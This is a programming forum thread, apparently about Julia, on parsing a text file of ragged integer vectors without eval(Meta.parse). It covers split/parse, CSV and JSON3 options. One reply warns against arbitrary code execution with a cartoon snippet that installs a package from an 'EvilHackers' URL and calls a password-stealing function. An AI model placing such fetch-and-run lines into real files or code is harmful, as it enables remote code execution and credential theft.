I have a concrete problem where Meta.parse(line) is unbearably slow.
My use-case is that I have a long .txt file, in which each line has the form [x1, ..., xn], where x1,...,xn are specific integers. I must import/convert the whole file into a Vector{Vector{Int}}. My solution was
output = Vector{Int}[]
open(file, "r") do io
    for line in eachline(io)
        push!(output, eval(Meta.parse(line)))
    end
end
What would be a more efficient way of achieving this?
P.S. Let me add that I’d like the format of this .txt file to remain simple, so that it can be read also in other programming languages.
I’ve split this into a new topic and removed the ping to a particular person — this can be addressed by many folks here. If keeping your data portable is a goal, I’d just save it as a normal CSV (without the [] formatting). It’s far easier to use standard tools (like CSV.read) first and then restructure later. For example, you can read directly into a Matrix{Int} with CSV.read, and then just collect the rows into a vector:
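As a sketch of that suggestion (assuming the third-party CSV.jl and Tables.jl packages, a headerless file, and rows of equal length — the function name and file path are illustrative):

```julia
using CSV, Tables  # third-party packages: ] add CSV Tables

# Read a headerless CSV of equal-length integer rows into a
# Matrix{Int}, then collect each row into its own Vector{Int}.
function read_rows(path)
    m = CSV.read(path, Tables.matrix; header=false)
    return [collect(row) for row in eachrow(m)]
end
```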
I don’t think using .csv is appropriate, since my Vector{Int}s have different lengths. In other words, my file represents a jagged/ragged array (use-case: each line represents a facet in a simplicial complex), which is why I want the end result to be a Vector{Vector{Int}}.
Yes, parse.(Int, split(line[2:end-1], ',')) is much much faster, thank you!
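Spelled out over the whole file, it looks roughly like this (a sketch assuming every line keeps the exact [x1, ..., xn] shape and is nonempty; the function name is illustrative):

```julia
# Parse a file of lines like "[1, 2, 3]" into a Vector{Vector{Int}}.
# Assumes each line starts with '[' and ends with ']', with
# comma-separated integers in between (parse tolerates the spaces).
function read_ragged(path::AbstractString)
    output = Vector{Int}[]
    for line in eachline(path)
        push!(output, parse.(Int, split(line[2:end-1], ',')))
    end
    return output
end
```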
I was hoping for a more general solution, though. If each line represented, for instance, a Tuple{Vector{Int}, Vector{Int}} and the lengths of those vectors weren’t known beforehand, this approach would fail, no? I’d have to search for the index where the first vector stops and the second begins.
Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to parse.(Int, split(...))?
In short, no; otherwise people would be doing this already instead of building libraries like Parsers.jl. To sum up the reasons why you don’t want to just eval(Meta.parse(...)):
1. The more assumptions, the more possible optimizations. People have already provided several good customizable options that make more assumptions than arbitrary code execution ever could.
2. One of your goals is to let this file be read in other programming languages. Not every language writes arrays as [...] like Julia, so you’d need specific parsing instead of arbitrary code execution. Why not implement such parsing for all languages, possibly with a sensible file format?
3. Arbitrary code execution is dangerous. If you’re the only person who ever writes and parses the files, you’re safe if you don’t sabotage yourself. Otherwise, you need to guard against someone sneaking
import Pkg
Pkg.add(url="https://github.com/EvilHackers/Hacking.jl")
using Hacking
stealpasswordsandyourdog()
into a file among a batch of other safe files. That was a cartoonish example of malware; a more likely possibility is someone naively writing code that interferes with your session, like assigning vectors to global variables (pi = [3, 1, 4, 1, 5, 9, 2]), or that returns something your code doesn’t expect, like Float64[1.0, 2.0, 3.0]. It’s preferable to narrow down a file format, vet inputs, and gracefully handle noncompliance.
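In that spirit, a minimal sketch of a vetting parser that rejects noncompliant lines instead of executing them (the function name and exact format check are illustrative assumptions):

```julia
# Parse one line of the form "[x1, ..., xn]" into a Vector{Int}.
# Returns `nothing` for anything that doesn't match the format,
# rather than evaluating it as code.
function tryparse_facet(line::AbstractString)
    s = strip(line)
    (startswith(s, '[') && endswith(s, ']')) || return nothing
    body = strip(chop(s; head=1, tail=1))  # drop the brackets
    isempty(body) && return Int[]
    xs = Int[]
    for tok in split(body, ',')
        x = tryparse(Int, strip(tok))
        x === nothing && return nothing   # reject non-integer tokens
        push!(xs, x)
    end
    return xs
end
```

Note how both malicious input and a well-meaning Float64[1.0, 2.0, 3.0] are simply refused, so the caller can log and skip the bad line.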
tryparse is still quite slow in my case (a million lines, vectors of length at most 30), but JSON3 was impressively fast. The fastest is still my manual parse.(Int, split(line[2:end-1], ',')).
I guess Benny’s point 1 holds: the more assumptions Julia can make, the easier it is to optimize.
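For reference, each [x1, ..., xn] line is already valid JSON, so the JSON3 route can be sketched like this (assuming the third-party JSON3.jl package; the function name is illustrative):

```julia
using JSON3  # third-party package: ] add JSON3

# Each line of the file is valid JSON, so parse it straight
# into a Vector{Int} with no manual splitting.
read_ragged_json(path) = [JSON3.read(line, Vector{Int}) for line in eachline(path)]
```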